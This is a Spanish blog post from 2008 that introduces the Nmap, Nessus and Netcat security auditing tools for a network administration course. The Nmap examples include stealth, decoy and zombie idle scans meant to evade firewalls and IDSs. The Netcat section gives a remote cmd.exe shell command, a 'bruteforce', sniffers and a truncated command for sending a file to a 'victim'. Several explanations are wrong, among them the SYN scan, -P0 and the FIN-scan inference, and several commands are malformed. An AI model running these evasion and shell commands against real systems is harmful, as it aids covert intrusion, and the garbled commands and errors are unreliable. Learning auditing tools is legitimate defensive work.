Administracion de Redes

Administracion de Redes
En este blog encontraran todo lo relacionado con el modulo de seguridad de administracion de redes, aunque tambien encontraran documentos relacionados con tecnologia e informatica.

miércoles, 11 de junio de 2008

SOFTWARE DE AUDITORIA DE SEGURIDAD

NMAP

Nmap es una herramienta desarrollada por Fyodor de www.insecure.org, es una herramienta básica que permite realizar una labor sencilla de revisión (escaneo) de puertos y reporte del tipo de sistema operativo que usa la máquina.

Estas máquinas que escanearemos tienen cualquier tipo de sistema operativo, es un escaneo de puertos tcp (o udp) que es un estándar de internet y no depende del sistema operativo. Es decir, la máquina a ser escaneada puede estar en windows, linux, puede ser un switch o un ruteador o cualquier elemento de una red con dirección IP.

Advertencia: Este programa puede ser utilizado para realizar auditorias de seguridad en una red y a la vez brindarle seguridad parchando las posibles vulnerabilidades, pero también puede ser utilizada para fines delictivos, ya que pone al descubierto, puertos abiertos en las computadoras de una red, así como también es posible conocer como se encuentra organizada, y de cuantas computadoras consta una red. Es una herramienta pública que está disponible en internet y esté hecho mayormente para ayudar a mejorar nuestra red y es para esto que la explicamos

Tipos de escaneo

-sT(Escaneo TCP connect())
Se usa para establecer una conexión con todos los puertos interesantes de la máquina

-sS (Escaneo TCP SYN)
Nos abre una conexión TCP completa. Se envía un paquete SYN y se espera a la respuesta. Un SYN/ACK indica que el puerto está a la escucha y se envía un RST para cortar la conexión. Se necesitan privilegios de Root para construir estos paquetes.

-sF -sX -sN(Modos Stealth FIN, Xmas Tree o Nul scan)
La idea es que se requiere que los puertos cerrados respondan a nuestro paquetes de prueba con un RST, mientras que los puertos abiertos deben ignorar los paquetes en cuestión.
El escaneo FIN utiliza un paquete FIN vacio (sorpresa) como prueba, Xmas tree
activa las flags FIN, URG y PUSH y NULL desactiva todas las flags. Si el escaneo encuentra puertos cerrados, probablemente se trate de una maquina UNIX, mientras que todos los puertos abiertos es indicativo de Windows.

-sP (Escaneo ping)
Algunos sitios web como microsoft.com pueden rechazar este tipo de paquetes.

-sU (Escaneo Udp)
Este método se usa para saber que puertos UDP (Protocolo de Datagrama de Usuario, RFC 768) están abiertos en un servidor.

-b (ataque de rebote ftp)
Se usa un servidor ftp que este detrás de un firewall como proxy para escanear las máquinas que puedan estar detrás del mismo. El formato es:nombre_de_usuario:password@servidor:puerto

-p0
Nos intenta hacer ping a un servidor antes de escanearlo.(microsoft.com)

-PT
Usa el ping TCP para determinar que servidores están activos. En vez de enviar paquetes de petición de ecos ICMP y esperar una respuesta, se lanzan paquetes TCP ACK y se espera a que lleguen las respuestas.

-PS
Esta opción usa paquetes SYN en vez de los paquetes ACK para usuarios root.

-PI
Esta opción usa una petición de eco ICMP. Encuentra servidores que están activos y también busca direcciones de broadcast dirigidas a subredes en una red. Se trata de direcciones

-PB
Este es el tipo de ping por defecto. Usa los barridos ACK ( -PT ) e ICMP ( -PI ) en paralelo.

-O
Esta opción activa la detección remota del sistema operativo por medio de la huella TCP/IP y lo compara con una base de datos de conocidas huellas TCP/IP para decidir que tipo de sistema se esta escaneando.

-p
Esta opción determina los puertos que se quieren especificar.

-i
Lee especificaciones de servidores o redes de destino a partir del archivo especificado en vez de hacerlo de la línea de comandos.

-g
Establece el numero de puerto de origen a usar en los escaneos.

-h
Ayuda sobre los comandos de nmap

--packet_trace
nmap imprime información detallada de cada paquete que envía y recibe

--version_trace
Resumen de packet_trace detallando la versión del servicio

-sI : Idle scan que se basa en números de secuencia predecibles para lanzar ataques a través de equipos zombis (las impresoras jetdirect son buenas candidatas)
#nmap -p 3467 -P0 -sI IP_zombie IP_objetivo

-b : opción utilizada para realizar escaneos utilizando algunos servidores FTP como proxys o relays de escaneos. Técnica de escaneos por rebote.

-D : opción decoy para camuflar dentro de un rango de direcciones la IP de origen del escaneo
#nmap -P0 -D IP_decoy IP_objetivo

-L : opción que permite listar y resolver Ips sin escanear
#nmap -sL 192.168.2.1-120


Ejemplos

#nmap -v objetivo.ejemplo.com

Escanear todos los puertos TCP reservados de una maquina

#nmap -v -p 80 '*.*.2.3-5'

Encontrar servidores web en maquinas cuyas direcciones IP terminen en .2.3, .2.4

#nmap -v -sS -O www.miweb.net 192.168.2.0/24 '192.88-90.*.*'
Escanea con SYNs detectando el sistema operativo destino en diferentes hosts

#nmap -p 443 -O -sV 192.168.2.1
Escanea el puerto 443 del host intentando adivinar las aplicaciones que se ejecutan

#nmap -sU -A -T Insane 192.168.2.1
Escanea con UDP y -A=( -sV y -O) de forma agresiva presentando resultados rápidos

#nmap -T Insane -n -O -sS 192.168.2.*
Escanea toda la red con SYNs de forma agresiva y detectando sistemas operativos

#nmap -oA nmaplog 192.168.2.1
Escanea y escribe logs de diferentes tipos al archivo nmaplog

#nmap -p 3389 -P0 -sF 192.168.2.1 FIN SCAN
Escanea con FIN scan sin ping el puerto 3389. Más silencioso para los FWs/IDSs

Cuando un puerto está cerrado habitualmente el host responde con un RESET , cuando está abierto o filtrado no envía nada por lo que se puede obtener un listado de puertos decente si esto lo combinamos con la opción -sV que nos dice el tipo de servicio que está escuchando

#nmap -p 3389 -P0 -sX 192.168.2.1 XMAS SCAN
Similar al FIN scan pero activa los flags URG y PUSH

#nmap -p 3389 -P0 -sN 192.168.2.1 NULL SCAN
No activa flags de los paquetes

#nmap -P0 --packet_trace 192.168.2.1

Escanea con trazas detalladas



NESSUS

Nessus es un programa que busca cualquier tipo de vulnerabilidad en la red y te ofrece un análisis completo de su nivel de seguridad. Incluso analiza los servicios ejecutados más de una vez por un mismo cliente.

El objetivo de los desarrolladores de Nessus es mantener su herramienta siempre actualizada, ya que día a día se descubren nuevas amenazas, como las que se ciernen sobre clientes de correo y navegadores, cada vez más “abandonados” por otros sistemas.

Nessus comienza escaneando los puertos con nmap o con su propio escaneador de puertos para buscar puertos abiertos y después intentar varios exploits para atacarlo. Las pruebas de vulnerabilidad, disponibles como una larga lista de plugins, son escritos en NASL (Nessus Attack Scripting Language, Lenguaje de Scripting de Ataque Nessus por sus siglas en inglés).

Opcionalmente, los resultados del escaneo pueden ser exportados en reportes en varios formatos, como texto plano, XML, HTML, y LaTeX. Los resultados también pueden ser guardados en una base de conocimiento para referencia en futuros escaneos de vulnerabilidades.


Para utilizar Nessus necesitas:

· Sistema operativo: Win2000/XP/2003



NETCAT

Netcat (a menudo referida como la navaja multiusos de los hackers) es una herramienta de red bajo licencia GPL disponible para sistemas UNIX, Microsoft y Apple que permite a través de intérprete de comandos y con una sintaxis muy sencilla abrir puertos TCP/UDP en un HOST (quedando netcat a la escucha), asociar una shell a un puerto en concreto (para conectarse por ejemplo a MSDOS o al intérprete bash de Linux remotamente) y forzar conexiones UDP/TCP (útil por ejemplo para realizar rastreos de puertos o realizar transferencias de archivos bit a bit entre dos equipos).

Sus capacidades hacen que sea a menudo usada como una herramienta para abrir puertas traseras una vez invadido un sistema y obtenido privilegios de administrador o root del equipo. También resulta extremadamente útil a efectos de depuración para aplicaciones de red.


Varios ejemplos sencillos para usar netcat:

Ejecutar un shell en máquina remota
nc -l -p 23 xxx.xxx.xxx.xx 23 -t -e cmd.exe

Estudiar puertos
nc -v (puedes añadir otra -v)

Bruteforce en un puerto
nc -v 79 <> log.txt
(envía user.txt y guarda la respuesta en log.txt)

Scanner de puertos en localhost (rango 1-53)
nc -v -v -z 127.0.0.1 1-53

Sniffer en pantalla
nc -v -v -L 127.0.0.1 -p 23

Sniffer en un log
nc -v -v -L -p 23 127.0.0.1 -t >login.txt

Conexiones no autorizadas en un puerto
nc -u -v -v -L -p 31337 127.0.0.1 31337

Mandar un archivo a víctima
nc -v -v -L -p 21 nombre del host -t <>

No hay comentarios: